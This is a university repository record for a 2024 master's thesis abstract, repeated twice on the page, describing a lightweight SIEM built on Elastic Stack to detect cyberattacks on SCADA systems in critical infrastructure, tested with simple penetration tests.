Tactical SIEM for Continuous SCADA System Cyber Threat Monitoring
Kujala, Johannes (2024)
Kujala, Johannes
2024
Sähkötekniikan DI-ohjelma - Master's Programme in Electrical Engineering
Informaatioteknologian ja viestinnän tiedekunta - Faculty of Information Technology and Communication Sciences
This publication is copyrighted. You may download, display and print it for Your own personal use. Commercial use is prohibited.
Hyväksymispäivämäärä
2024-05-31
Julkaisun pysyvä osoite on
https://urn.fi/URN:NBN:fi:tuni-202405095613
https://urn.fi/URN:NBN:fi:tuni-202405095613
Tiivistelmä
Critical infrastructure is considered an asset or system which is essential for the maintenance of crucial functions of our society. Cyberattacks in these critical infrastructure systems have become more common in recent years. In 2009-2010, a malware named Stuxnet was used to wound an Iranian uranium enrichment facility. In 2015 and 2016, two different malwares were used to cause two separate power outages in Ukraine impacting hundreds of thousands of customers.
This thesis introduces a Security Information and Event Management (SIEM) system as a mean to prevent cyberattacks in SCADA environments, which are commonly used in supervising and controlling critical infrastructure. The objective of a SIEM system is to monitor log events of any devices in the system, and alert system operators if any suspicious activity is detected. A SIEM system should be able to collect log data from various devices and applications. In a critical infrastructure environment, these may include e.g., server computers, firewalls, IEDs, and SCADA software. The log events are then converted to a common format as log data from various source devices should be comparable.
A SIEM system detects abnormalities by utilizing a rule engine configured by the system administrator. Detection rules can be either user configured or pre-configured by the SIEM developer. The configuration and operation of the SIEM system is generally done in a separate user interface.
In this thesis, an objective was to build a tactical SIEM system, a SIEM that only collects a limited number of logs to keep the system simple to configure and administer. However, such SIEM system should still be able to detect various potential attack vectors. The SIEM system to be implemented into a SCADA environment was configured using Elastic Stack. It for chosen in this thesis because of the modification capabilities and the easy availability of the software. The SIEM system is installed into a Windows-based virtual environment, in which the focus is the Windows Event Logs.
After detection rules have been created in the SIEM system, their functionality can be verified by utilizing penetration testing. The objective of penetration testing is to simulate the action of a potential cyber attacker in various ways. In this thesis, however, testing is executed quite superficially.
The SIEM system used in the thesis was discovered to be capable of detecting all attack vectors that were tested. For example, the tested attack vectors included port scans and PowerShell scripts containing suspicious elements. However, as the SIEM was configured, and the penetration testing was conducted by the same person, the test results should not be directly applied to any real-world systems.
Overall, Elastic Stack is a well-functioning SIEM system that could be used in conjunction with a SCADA system in a critical infrastructure environment. However, operating and administering the software requires rather different skillset than needed in conventional SCADA engineering. Therefore, an alternative is proposed to configure a SCADA application to be used as a lightweight SIEM system. The advantage would be that the SIEM configuration and operation would be carried out in a more familiar environment. The scope of monitored devices would, however, be significantly lower. Therefore, this type of a SCADA SIEM would only be feasible in specific compact SCADA environments with few perimeter devices.
This thesis introduces a Security Information and Event Management (SIEM) system as a mean to prevent cyberattacks in SCADA environments, which are commonly used in supervising and controlling critical infrastructure. The objective of a SIEM system is to monitor log events of any devices in the system, and alert system operators if any suspicious activity is detected. A SIEM system should be able to collect log data from various devices and applications. In a critical infrastructure environment, these may include e.g., server computers, firewalls, IEDs, and SCADA software. The log events are then converted to a common format as log data from various source devices should be comparable.
A SIEM system detects abnormalities by utilizing a rule engine configured by the system administrator. Detection rules can be either user configured or pre-configured by the SIEM developer. The configuration and operation of the SIEM system is generally done in a separate user interface.
In this thesis, an objective was to build a tactical SIEM system, a SIEM that only collects a limited number of logs to keep the system simple to configure and administer. However, such SIEM system should still be able to detect various potential attack vectors. The SIEM system to be implemented into a SCADA environment was configured using Elastic Stack. It for chosen in this thesis because of the modification capabilities and the easy availability of the software. The SIEM system is installed into a Windows-based virtual environment, in which the focus is the Windows Event Logs.
After detection rules have been created in the SIEM system, their functionality can be verified by utilizing penetration testing. The objective of penetration testing is to simulate the action of a potential cyber attacker in various ways. In this thesis, however, testing is executed quite superficially.
The SIEM system used in the thesis was discovered to be capable of detecting all attack vectors that were tested. For example, the tested attack vectors included port scans and PowerShell scripts containing suspicious elements. However, as the SIEM was configured, and the penetration testing was conducted by the same person, the test results should not be directly applied to any real-world systems.
Overall, Elastic Stack is a well-functioning SIEM system that could be used in conjunction with a SCADA system in a critical infrastructure environment. However, operating and administering the software requires rather different skillset than needed in conventional SCADA engineering. Therefore, an alternative is proposed to configure a SCADA application to be used as a lightweight SIEM system. The advantage would be that the SIEM configuration and operation would be carried out in a more familiar environment. The scope of monitored devices would, however, be significantly lower. Therefore, this type of a SCADA SIEM would only be feasible in specific compact SCADA environments with few perimeter devices.